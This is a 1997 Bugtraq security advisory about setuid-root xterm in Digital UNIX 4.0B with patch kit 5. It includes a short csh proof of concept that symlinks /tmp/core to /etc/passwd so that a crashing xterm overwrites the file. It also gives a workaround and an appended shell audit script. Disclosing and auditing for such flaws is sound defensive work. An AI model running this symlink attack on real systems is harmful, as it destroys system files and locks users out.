Bugtraq mailing list archives
Digital Unix Security Problem
From: tom () sba miami edu (Tom Leffingwell)
Date: Wed, 12 Nov 1997 14:51:40 -0500
I tried reporting this to DEC, but because I didn't have a software support agreement number handy, they wouldn't let me report anything, then they placed me on hold for 30 minutes, then they disconnected me.

Tip to DEC: Allow people to report security problems without paying for software support. Or at least allow someone other than the designated contact to report security problems.

Version Affected: Digital UNIX 4.0B *with* patch kit 5

Unpatched 4.0B is not vulnerable to this particular problem, but it is to others.

Impact: Local users may overwrite system files, and possibly obtain root.

Problem: Patch kit 5 included a replacement xterm because the old one had a bug, too. They replaced it with another that had a bigger problem. You can cause a segmentation fault in xterm simply by setting your DISPLAY variable to a display that you aren't allowed to connect to or one that doesn't exist. Start xterm, and you get a core file.

Xterm is installed setuid root. I'm not 100% sure what happens, since DEC doesn't release the source for patches. It does dump core at XtOpenApplication(), however. Even with a buffer overflow, I've never seen anyone exploit one on DU. If anyone has done so successfully, please email me.

Despite that, a person with basic knowledge of unix could easily do something like:

    #!/bin/csh
    cd /tmp
    ln -s /etc/passwd /tmp/core
    setenv DISPLAY abcdefghi
    /usr/bin/X11/xterm

The contents of /etc/passwd become xterm's core, preventing further logins. Obviously you could do things without an immediate impact such as ln -s /vmunix /tmp/core.

Workaround: Needless to say, change permissions on xterm and have the users run dxterm; it's better anyway.

___________________________________________________________________
Tom Leffingwell University of Miami (305) 284-1337
Systems Administrator Support Manager
Information Technology School of Business
Ungar 138 Jenkins 314M
___________________________________________________________________
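An audit for the two conditions the message describes, a setuid xterm binary and a symlink named core waiting in a writable directory. This is an added example, not part of the original post: the function names are hypothetical, the paths are supplied by the caller, and it assumes a readlink utility is available.

```shell
#!/bin/sh
# Added example, not from the original post. Function names are
# hypothetical; the caller supplies the binary path and directories.

# Print "link -> target" for each symlink named core (or core.*) that sits
# directly in the given directory. Dangling links are reported as well,
# since a core dump written through one would create the target.
find_core_symlinks() {
    dir=$1
    for f in "$dir"/core "$dir"/core.*; do
        [ -L "$f" ] || continue
        target=$(readlink "$f")
        printf '%s -> %s\n' "$f" "$target"
    done
}

# Succeed if the file has its setuid bit set.
is_setuid() {
    [ -u "$1" ]
}

# audit BINARY DIR...
# Warn if BINARY is setuid, and list symlinked core files in each DIR.
# Returns 0 when nothing was flagged, 1 otherwise.
audit() {
    xterm_path=$1
    shift
    status=0
    if is_setuid "$xterm_path"; then
        echo "WARN: $xterm_path is setuid"
        status=1
    fi
    for d in "$@"; do
        hits=$(find_core_symlinks "$d")
        if [ -n "$hits" ]; then
            echo "WARN: symlinked core file(s) in $d:"
            echo "$hits"
            status=1
        fi
    done
    return $status
}
```

Calling `audit /usr/bin/X11/xterm /tmp` covers the binary and directory named in the message; add any other directories from which users start xterm.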